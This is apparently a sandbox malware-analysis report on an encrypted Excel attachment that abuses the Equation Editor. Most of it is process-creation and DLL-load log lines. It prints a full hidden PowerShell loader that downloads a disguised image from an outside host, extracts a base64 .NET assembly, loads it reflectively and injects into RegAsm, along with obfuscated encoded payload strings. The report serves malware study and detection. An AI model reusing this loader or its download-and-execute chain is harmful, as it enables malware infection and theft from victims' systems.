eDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbsJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\wscript.exeAutomated click: OK
            Source: C:\Windows\System32\wscript.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.466787853.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.502494701.00000000093C0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256 source: powershell.exe, 0000000C.00000002.466787853.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.502494701.00000000093C0000.00000004.08000000.00040000.00000000.sdmp
            Source: FE430000.0.drInitial sample: OLE indicators vbamacros = False
            Source: Ref19920830281982938RT.xlsInitial sample: OLE indicators encrypted = True

            Data Obfuscation

            barindex
            Suspicious powershell command line found
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); 